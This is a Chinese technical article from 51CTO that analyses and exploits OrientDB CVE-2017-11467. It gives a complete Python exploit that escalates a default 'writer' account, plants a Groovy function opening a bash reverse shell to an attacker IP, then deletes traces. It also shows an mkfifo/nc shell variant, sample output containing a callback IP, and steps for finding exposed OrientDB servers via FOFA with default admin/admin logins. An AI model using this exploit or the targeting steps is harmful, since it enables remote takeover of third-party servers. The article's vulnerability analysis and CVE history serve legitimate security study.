51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

OrientDB远程代码执行漏洞利用与分析

原创
作者:陈小兵
安全 应用安全
OrientDB数据库是一个支持分布式的NoSQL数据库,主要针对文档以及图形等进行检索,通过研究发现其默认配置admin、reader和writer三个角色,在处理where”或“fetchplan”或“order by”函数时,由于在OrientDB中有一个执行groovy函数,groovy包装类没有沙箱,暴露了系统函数,因此我们可以运行我们想要的任何命令。该漏洞在国外被命名为CVE-2017-11467,本文主要对该漏洞的分析方法和实战进行探讨。

[[200752]]

【51CTO.com原创稿件】OrientDB数据库是一个支持分布式的NoSQL数据库,主要针对文档以及图形等进行检索,通过研究发现其默认配置admin、reader和writer三个角色,在处理where”或“fetchplan”或“order by”函数时,由于在OrientDB中有一个执行groovy函数,groovy包装类没有沙箱,暴露了系统函数,因此我们可以运行我们想要的任何命令。该漏洞在国外被命名为CVE-2017-11467,本文主要对该漏洞的分析方法和实战进行探讨。

0x01.OrientDB简介

OrientDB是分布式兼具文档数据库的灵活性和图形数据库管理链接能力的可深层次扩展的文档-图形数据库管理系统,也是可升级,高性能的操作NoSQL数据库。可选无模式、全模式或混合模式下。支持许多高级特性,诸如ACID事务、快速索引,原生和SQL查询功能。可以JSON格式导入、导出文档。若不执行昂贵的JOIN操作的话,如同关系数据库可在几毫秒内可检索数以百G的链接文档图,其最新版本为OrientDB v2.2.26。官方网站:http://orientdb.comhttps://github.com/Orientechnologies

图1Orientdb

0x02. OrientDB基础

2.1OrientDB的一些基本概念

Classes : 类比关系型数据库系统中的Table与传统文档数据库的collections。这个概念来自于OOP(Object-oriented programming)的理念。class用于定义数据结构的模型。

Record:record是OrientDB中最小的加载和存储的单位。record有四种类型:Document、RecordBytes(BLOB)、Vertex、Edge。

Document:是OrientDB中最灵活的record。Document支持schema-less,schemal-full,schema-mixed,即可以在定义数据结构的时候指定属性及约定条件,也可以不指定。它通过create class语法来定义一个数据结构。

Vertex:在OrientDB的graph模型下,每个结点叫作Vertex,每个Vertex也是一个Document。

Edge:在OrientDB的graph模型下,连接两个Vertex的边叫作Edge。Edge是有向性的而且仅能连接两个Vertex。

Clusters : 用于存储record。每个数据库最多有32767个cluster。每个class都必须至少有一个对应的cluster。默认情况下OrientDB会自动为每个class创建与当前cpu核数相同的cluster,其中有一个默认的cluster。

Cluster Selection:当新增加一条reocrd时OrientDB会根据cluster section为这条记录选择一个cluster。cluster section有四条类型:detault、round-robin、balanced、local。

Record ID :每个record都有一个record id。 record id的格式如下:

  1. #<cluster-id>:<cluster-position>。 

Relationships: OrientDB中不使用join,它通过在每个reocrd中定义一个关系类型的属性来维护关系。这个关系属性存储的实际是record id,就像定义一个指针在内存中将两个record联系起来。

Inheritance & Polymorphic: OrientDB支持面向对象的继承和多态特性。

2.2OrientDB的特性

OrientDB是用Java语言实现的,运行在JVM之上。

Multi-Model:OrientDB支持多种模型:Key/Value, Object, Document, and Graph。

Multi-Master Replication: OrientDB集群部署时每个点都是Master,每个Master上都有完整的数据。一旦一个Master上的数据发生变更,会将发生变更的数据同步通知其它Master。

Extended SQL : OrientDB支持大部分标准的SQL,同时在标准的SQL之上扩展了部分功能以方便图的操作。

Easy Integration :使用teleporter可以很容易地将数据从RDBMS迁移到OrientDB上。

OOP:OrientDB定义数据结构的Class符合OOP(Object-oriented programming)的理念,支持继承和多态的特性。

2.2OrientDB的SQL

在写图数据库的SQL时,第一步是要确认起始点(这个也是图数据库比较耗时的地方),一旦起始点确认后,我们便可以近乎物理连接的方式查询这个起始点相关联的数据。

基本的SQL:OrientDB支持大部分标准的SQL查询。

例如:SELECT FROM Person WHERE name LIKE 'Luk%'

Traverse:traverse语法可以遍历获取一个record联结的reocrd。它比select使用起来更简单和快速。

例如:RAVERSE out("Friend") FROM #10:1234 WHILE $depth <= 3

Match:match是一种表述力很强的查询语法结构,类比Neo4j的Cypher语法结构。它以一种说明式的方式来查询。

例如:

  1. MATCH {class: Person, as: person, where: (name = 'John' AND surname = 'Doe')}.both('Friend').both('Friend' 
  2. {as: friendOfFriend} RETURN person, friendOfFriend 

0x03. OrientDB漏洞 CVE-2017-11467分析

3.1搭建测试环境

(1)docker安装,这个安装的是最新版本,有可能修补了漏洞

  1. docker run -d --name orientdb -p 2424:2424 -p 2480:2480 -e ORIENTDB_ROOT_PASSWORD=root orientdb:latest 

(2)linux下安装orientdb

  1. wget -O orientdb-community-2.2.22.tar.gz http://orientdb.com/download.php?file=orientdb-community-2.2.22.tar.gz&os=linux  
  2. tar -zxf orientdb-community-2.2.22.tar.gz 
  3. mv orientdb-community-2.2.22 /opt/orientdb  
  4. /opt/orientdb/bin/server.sh  
  5. useradd -r orientdb -s /sbin/nologin 
  6. chown -R orientdb:orientdb /opt/orientdb  
  7. chmod 640 /opt/orientdb/config/orientdb-server-config.xml 
  8. cp /opt/orientdb/bin/orientdb.service /etc/systemd/system  
  9. vi /etc/systemd/system/orientdb.service  
  10. 修改User=ORIENTDB_USER Group=ORIENTDB_GROUP ExecStart=$ORIENTDB_HOME/bin/server.sh为: 
  11. User=orientdb Group=orientdb ExecStart=/opt/orientdb/bin/server.sh 
  12. systemctl daemon-reload 
  13. systemctl enable orientdb 
  14. systemctl status orientdb 

注意:

(1)如果是虚拟机,则需要修改内存大小,默认64位是512G,修改为1G!需要修改/opt/orientdb/bin下的所有bat文件和sh文件。否则会报“Invalid maximum direct memory size: -XX:MaxDirectMemorySize=512g”错误。

(2)设置路径和用户,在对应的sh文件中设置

  1. ORIENTDB_DIR="/opt/orientdb/" 
  2. ORIENTDB_USER="orientdb" 

3.2漏洞分析

1.用户权限

OrientDB使用RBAC模型进行认证方案。默认情况下,OrientDB有3个角色:管理员(admin),作者(writer)和读者(reader)。这些用户名与角色相同。对于在服务器上创建的每个数据库,默认情况下分配这3个用户。

用户的权限是:

admin:访问数据库上的所有功能,没有任何限制

reader:只读用户。读者可以查询数据库中的任何记录,但不能修改或删除它们。它不能访问内部信息,例如用户和角色本身。

writer:与“读者”相同,但也可以创建,更新和删除记录

2.越权导致命令执行

ORole结构处理用户及其角色,只能由管理员访问。OrientDB需要oRole读取权限来允许用户显示用户的权限以及与oRole权限相关联的其他查询。但在版本2.2.x中,每当上述oRole查询包含where、fetchplan和ORDER BY语句,则不需要此权限的要求和信息,而返回给未经授权的用户从而导致命令执行

例:

  1. select * from <em>oRole</em> order by name

当每个数据库创建时会创建writer用户,这样,即使db管理员更改管理员用户密码,攻击者仍然可以使用writer用户获取代码执行。由于我们启用了where、fetchplan和ORDER BY函数,在OrientDB中有一个执行groovy函数,groovy包装类没有沙箱,暴露了系统函数,因此我们可以运行我们想要的任何命令。

示例Groovy函数:

  1. Command.md 
  2. def command = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 
  3. >/tmp/f' 
  4.  File file = new File("hello.sh"
  5.  file.delete() 
  6.  file << ("#!/bin/bash\n"
  7.  file << (command) 
  8.  def proc = "bash hello.sh".execute() 

3.概念证明

(1)监听8081端口。

在8081端口运行Netcat:nc -lv 8081

运行以下命令:

  1. python PoC.py ip [port] 

(2)poc.py

  1. import sys 
  2. import requests 
  3. import json 
  4. import string 
  5. import random 
  6. target = sys.argv[1] 
  7. try: 
  8.     port = sys.argv[2] if sys.argv[2] else 2480 
  9. except
  10.     port = 2480 
  11. url = "http://%s:%s/command/GratefulDeadConcerts/sql/-/20?format=rid,type,version,class,graph"%(target,port) 
  12. def random_function_name(size=5, chars=string.ascii_lowercase + string.digits): 
  13.     return ''.join(random.choice(chars) for _ in range(size)) 
  14. def enum_databases(target,port="2480"): 
  15.     base_url = "http://%s:%s/listDatabases"%(target,port) 
  16.     req = requests.get(base_url) 
  17.     if req.status_code == 200: 
  18.         #print "[+] Database Enumeration successful" 
  19.         database = req.json()['databases'
  20.         return database 
  21.     return False 
  22. def check_version(target,port="2480"): 
  23.     base_url = "http://%s:%s/listDatabases"%(target,port) 
  24.     req = requests.get(base_url) 
  25.     if req.status_code == 200: 
  26.         headers = req.headers['server'
  27.         #print headers 
  28.         if "2.2" in headers or "3." in headers: 
  29.             return True 
  30.     return False 
  31. def run_queries(permission,db,content=""): 
  32.     databases = enum_databases(target) 
  33.     url = "http://%s:%s/command/%s/sql/-/20?format=rid,type,version,class,graph"%(target,port,databases[0]) 
  34.     priv_enable = ["create","read","update","execute","delete"
  35.     #query = "GRANT create ON database.class.ouser TO writer" 
  36.     for priv in priv_enable: 
  37.  
  38.         if permission == "GRANT"
  39.             query = "GRANT %s ON %s TO writer"%(priv,db) 
  40.         else
  41.             query = "REVOKE %s ON %s FROM writer"%(priv,db) 
  42.         req = requests.post(url,data=query,auth=('writer','writer')) 
  43.         if req.status_code == 200: 
  44.             pass 
  45.         else
  46.             if priv == "execute"
  47.                 return True 
  48.             return False 
  49.  
  50.     print "[+] %s"%(content) 
  51.     return True 
  52. def priv_escalation(target,port="2480"): 
  53.     print "[+] Checking OrientDB Database version is greater than 2.2" 
  54.     if check_version(target,port): 
  55.         priv1 = run_queries("GRANT","database.class.ouser","Privilege Escalation done checking enabling operations on database.function"
  56.         priv2 = run_queries("GRANT","database.function","Enabled functional operations on database.function"
  57.         priv3 = run_queries("GRANT","database.systemclusters","Enabling access to system clusters"
  58.         if priv1 and priv2 and priv3: 
  59.             return True 
  60.     return False 
  61. def exploit(target,port="2480"): 
  62.     #query = '"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"most","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":null' 
  63.     #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"ost","language":"groovy","code":"def command = 'whoami';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":None} 
  64.     func_name = random_function_name() 
  65.     print func_name 
  66.     databases = enum_databases(target) 
  67.     reverse_ip = raw_input('Enter the ip to connect back: '
  68.     query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/'+reverse_ip+'/8081 0>&1\';File file = new File(\\"hello.sh\\");file.delete();file << (\\"#!/bin/bash\\\\n\\");file << (command);def proc = \\"bash hello.sh\\".execute();","parameters":null}' 
  69.     #query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 >/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a     file.delete()       \u000a     file << (\"#!/bin/bash\")\u000a     file << (command)\n    def proc = \"bash hello.sh\".execute() ","parameters":null}' 
  70.     #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"lllasd","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute();","parameters":None} 
  71.     req = requests.post("http://%s:%s/document/%s/-1:-1"%(target,port,databases[0]),data=query,auth=('writer','writer')) 
  72.     if req.status_code == 201: 
  73.         #print req.status_code 
  74.         #print req.json() 
  75.         func_id = req.json()['@rid'].strip("#"
  76.         #print func_id 
  77.         print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name) 
  78.         req = requests.post("http://%s:%s/function/%s/%s"%(target,port,databases[0],func_name),auth=('writer','writer')) 
  79.         #print req.status_code 
  80.         #print req.text 
  81.         if req.status_code == 200: 
  82.             print "[+] Open netcat at port 8081.." 
  83.         else
  84.             print "[+] Exploitation failed at last step, try running the script again." 
  85.             print req.status_code 
  86.             print req.text 
  87.         #print "[+] Deleting traces.." 
  88.         req = requests.delete("http://%s:%s/document/%s/%s"%(target,port,databases[0],func_id),auth=('writer','writer')) 
  89.         priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser"
  90.         priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function"
  91.         priv3 = run_queries("REVOKE","database.systemclusters","Cleaning Up..database.systemclusters"
  92.         #print req.status_code 
  93.         #print req.text 
  94. def main(): 
  95.     target = sys.argv[1] 
  96.     #port = sys.argv[1] if sys.argv[1] else 2480 
  97.     try: 
  98.         port = sys.argv[2] if sys.argv[2] else 2480 
  99.         #print port 
  100.     except
  101.         port = 2480 
  102.     if priv_escalation(target,port): 
  103.         exploit(target,port) 
  104.     else
  105.         print "[+] Target not vulnerable" 
  106.  
  107. main() 

0x04.历史漏洞

  • CVE-2017-11467(高危)

OrientDB通过2.2.22在“where”或“fetchplan”或“order by”使用期间不执行特权要求,允许远程攻击者通过精心制作的请求执行任意操作系统命令。

  • CVE-2015-2918

在2.0.1之前的2.0.15和2.1.x之前的OrientDB Server Community Edition中的Studio组件没有适当地限制使用FRAME元素,这使远程攻击者更容易通过精心设计的网站进行劫持攻击。

  • CVE-2015年-2913

server/network/protocol/http/OHttpSessionManager.java在OrientDB Server社区版的Studio组件2.0.15、2.1.x和2.1.1之前版本不正确地依赖于java.util.Random类来生成随机Session ID值,这使远程攻击者更容易通过确定此类中的PRNG的内部状态来预测值。

  • CVE-2015-2912

在2.0.1之前的2.0.15和2.1.x之前的OrientDB Server Community Edition的Studio组件中的JSONP端点没有适当地限制回调值,这允许远程攻击者通过精心设计的HTTP请求进行跨站点请求伪造(CSRF)攻击,并获得敏感信息。

0x05.实战CVE-2017-11467漏洞利用

1.安装poc.py所需的组件

直接执行python CVE-2017-11467.py 127.0.0.1后,出现错误,如图2所示,则表示需要requests组件的支持,可以到https://pypi.python.org/pypi/requests/#downloads下载requests-2.18.4.tar.gz,可参考下载地址:

https://pypi.python.org/packages/b0/e1/eab4fc3752e3d240468a8c0b284607899d2fbfb236a56b7377a329aa8d09/requests-2.18.4.tar.gz

解压requests-2.18.4.tar.gz文件后,使用python setup.py install进行安装。

图2需要安装requests组件

2.寻找OrientDB

zoomeye目前在升级,因此用https://fofa.sol来进行搜索效果比较佳,关键词“orientdb && port=2480”,对于2.2.X版本基本是通杀。获取结果后,通过单击链接来查看可否正常访问。能够正常访问,登录密码一般都是admin/admin。

3.执行命令

(1)检测是否存在漏洞

例如python CVE-2017-11467.py 127.0.0.1后其结果:

  1. C:\Python27>python CVE-2017-11467.py 127.0.0.1 
  2. [+] Checking OrientDB Database version is greater than 2.2 
  3. [+] Privilege Escalation done checking enabling operations on database.function 
  4. [+] Enabled functional operations on database.function 
  5. [+] Enabling access to system clusters 
  6. 8bd94 
  7. Enter the ip to connect back: 59.***. ***.*** //输入反弹的IP地址,注意前后无空格 
  8. [+] Exploitation successful, get ready for your shell.Executing 8bd94 
  9. [+] Exploitation failed at last step, try running the script again. 
  10. 400 
  12.   "errors": [ 
  13.     { 
  14.       "code": 400, 
  15.       "reason""Bad request"
  16.       "content": "Error on evaluation of the script library. Error: org.codehaus 
  17. .groovy.control.MultipleCompilationErrorsException: startup failed:\u000aScript1 
  18. .groovy: 1: unexpected token: def @ line 1, column 1.\u000a   def 8bd94() {\u000 
  19. a   ^\u000a\u000a1 error\u000a\u000aScript library was:\u000adef 8bd94() {\u000a 
  20. def command = 'bash -i >& /dev/tcp/59.110.62.194/8081 0>&1';File file = new File 
  21. (\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def 
  22. proc = \"bash hello.sh\".execute();\u000a}\u000a\u000a\u000d\u000a\u0009DB name
  23. \"hierarchies\"" 
  24.     } 
  25.   ] 
  27. [+] Cleaning Up..database.class.ouser 
  28. [+] Cleaning Up..database.function 
  29. [+] Cleaning Up..database.systemclusters 

(2)设置反弹的IP

如果检测到目标对象存在漏洞,则提示输入一个反弹的IP地址,该IP地址事先需要进行8081端口监听,如果命令执行成功则获取反弹的shell,执行效果如图3和图4所示。

图3命令执行漏洞检测

图4获取反弹的shell

注意:

(1)由于命令是针对linux,因此反弹IP前不能有空格,否则执行不成功。

(2)反弹端口可以更改poc中的8081

(3)OrientDB数据库密码是加密的。例如获取某数据库配置文件中的数据库用户和密码:

  1. <user resources="*" password="{PBKDF2WithHmacSHA256}3D2969BF5BF1E819C6358CEF534327A32D205928D77B6D47:56B6EE75711C3600BCB23011685F253EE3F645E1BFA70AB8:65536" name="root"/> 
  2.        <user resources="connect,server.listDatabases,server.dblist" password="{PBKDF2WithHmacSHA256}AD0DA873F5BEB2343257A07B51326BBAECF8A894F960328E:B183077FF32DD1F40F3031EF048F5D8169E7EB6FB3C09004:65536" name="guest"/> 

【51CTO原创稿件,合作站点转载请注明原文作者和出处为51CTO.com】

责任编辑:武晓燕 来源: 51CTO专栏
OrientDB利用分析
相关推荐
ImageMagick远程执行漏洞分析利用
ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及PhotoCD等格式。

2016-09-29 14:37:39

ImageMagick漏洞分析
APACHE OFBIZ XMLRPC远程代码执行漏洞分析
近期,研究人员报告了一个存在于ApacheOFBiz中的反序列化漏洞。这个漏洞是由多个Java反序列化问题所导致的,当代码在处理发送至webtoolscontrolxmlrpc的请求时,便有可能触发该漏洞。未经认证的远程攻击者将能够通过发送精心构造的恶意请求来触发并利用该漏洞,并实现任意代码执行。

2020-10-08 13:44:27

漏洞
小米手机MIUI远程代码执行漏洞分析
7月笔者在研究webview漏洞时专门挑小米手机的MIUI测试了下,发现了非常明显的安全漏洞。通过该漏洞可以远程获取本地APP的权限,突破本地漏洞和远程漏洞的界限,使本地app的漏洞远程也能被利用,达到隔山打牛的效果。

2014-08-27 16:22:19

三星手机远程代码执行漏洞分析
远程攻击者完全有能力控制用户网络流量,操纵三星手机的键盘更新机制,并且在目标手机上使用系统用户权限执行代码。在三星设备中预装的快速键盘,无法禁用也无法卸载。即使这个快速键盘并非用户默认使用,攻击者也能够利用!

2015-06-18 10:49:31

Samba远程代码执行漏洞(CVE-2017-7494)分析
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE20177494,漏洞影响了Samba3.5.0和包括4.6.44.5.104.4.14中间的版本。360网络安全中心和360信息安全部的GearTeam第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。

2017-05-25 22:20:05

Zend Framework远程执行代码漏洞
本周bleepingcomputer揭露了一个不受信任的反序列化漏洞,攻击者可以利用ZendFramework在PHP站点上实现远程代码执行。

2021-01-26 10:00:45

漏洞网络安全网络攻击
ElasticSearch远程代码执行漏洞告警
ElasticSearch爆出严重安全漏洞(CVE20151427),该漏洞可造成远程代码执行,攻击者可直接获取系统权限,危害较大,请广大用户注意。

2015-03-06 15:31:01

反向ShellWindows多媒体中心远程执行漏洞利用
在本文中,我们会简单介绍反向shell和WindowsMediaCenter漏洞(CVE20152509)漏洞,最后详细介绍该漏洞的方法。

2015-09-20 20:13:55

Struts2远程代码执行漏洞s2-032分析及其利用
Struts2远程代码执行漏洞(s2032)引发了无数大型系统的“血案”,很多从事开发和安全维护的朋友,在4月26日基本是无眠之夜,在撰写本文时,在乌云和360补天平台上铺天盖地的s2032远程执行漏洞,航空、银行、学校和政府成为本次漏洞的重灾区,s2032远程代码执行漏洞危害大,本文对s2032漏洞进行介绍,并对如何利用等进行详细介绍。

2016-04-29 10:58:13

VMware vCenter Server远程代码执行漏洞正被黑客广泛利用
漏洞最初是由TZL团队的研究人员zbl和srs在中国2024年矩阵杯黑客大赛期间发现并报告,受到影响的版本包括VMwarevCenterServer7.0和8.0版本以及VMwareCloudFoundation4.x和5.x版本。

2024-11-19 15:58:56

Apache Struts重大漏洞被黑客利用远程代码执行风险加剧
网络安全研究人员最近发现,黑客正利用ApacheStruts2(一种流行的JavaWeb应用开发框架)中的一个重大漏洞进行网络攻击,该漏洞的追踪编号为CVE202453677,能使网络攻击者绕过网络安全措施,从而完全控制受影响的服务器。

2024-12-19 13:42:48

【高危预警】Samba远程代码执行漏洞(CVE-2017-7494)分析
Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE20177494,漏洞影响了Samba3.5.0之后到4.6.44.5.104.4.14中间的所有版本。360网络安全中心和360信息安全部的GearTeam第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。

2017-05-27 10:22:37

Windows用户仍需警惕远程代码执行漏洞
在其最新的年度安全报告中,微软声称屏蔽远程代码执行漏洞的工作已经取得阶段性进展。然而于本周一公布的报告最初版本证实内容有误。在2010财年中,微软产品总计爆出211项安全漏洞,分88条公告加以通知。根据微软给出的百分比结果显示,这些漏洞中有149项能够被远程代码执行所利用。而到了2011年,这一数字跃升为约178项。

2011-08-04 13:53:04

预警:微软有高危远程代码执行漏洞
据绿盟科技、360等厂商刚刚发布的漏洞预警称,微软发布的5月份月度更新中修复了一个存在于远程桌面服务中(RemoteDesktopServices)的高危远程代码执行漏洞(CVE20190708),RDP协议本身不受影响。该漏洞可以被蠕虫病毒利用,建议受影响用户尽快下载补丁升级进行防护。

2019-05-15 15:20:01

微软漏洞防护
Apache警告:Tomcat存在远程代码执行漏洞
MarkThomas,一位长期致力于Apache+Tomcat的工作者称“在某种情况下,用户可以上传恶意JSP文件到Tomcat服务器上运行,然后执行命令。JSP的后门可以用来在服务器上任意执行命令。”

2014-09-12 17:47:36

PayPal曝远程代码执行漏洞(含视频)
日前知名在线支付公司PayPal被曝存在严重的远程代码执行漏洞,攻击者可以利用该漏洞在PayPal的web应用服务器上执行恶意命令,最终获得服务器控制权限。

2015-04-30 08:11:40

uTorrent协议层远程漏洞分析利用
近期,世界上最流行的torrent客户端uTorrent被爆出了一个安全漏洞,该漏洞的CVE编号为CVE20208437。

2020-10-28 14:58:21

漏洞uTorrent协议层
漏洞预警!Apache Struts 2曝出远程代码执行漏洞
该漏洞被追踪为CVE202350164,其根源在于文件上传逻辑,该逻辑可实现未经授权的路径遍历,在这种情况下极易被用来上传恶意文件并执行任意代码。

2023-12-14 16:20:09

思科终于发布补丁修复远程代码执行漏洞
思科终于发布补丁,修复已有三年历史的远程代码执行漏洞。

2014-10-29 15:44:55

IIS再出远程执行漏洞:警惕新红色代码
微软在2015年4月的补丁日进行了多个漏洞修补,涉及到Windows、OFFICE、IE、IIS等多个环节,本次补丁数量显著高于平均水平。安天安全研究与应急处理中心通过补丁相关信息研判,认为其中有多个OFFICE和IE漏洞可能与近期各种攻击相关,而其中编号为MS15034的IIS远程执行漏洞极为值得高度关注。

2015-04-16 09:49:04

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服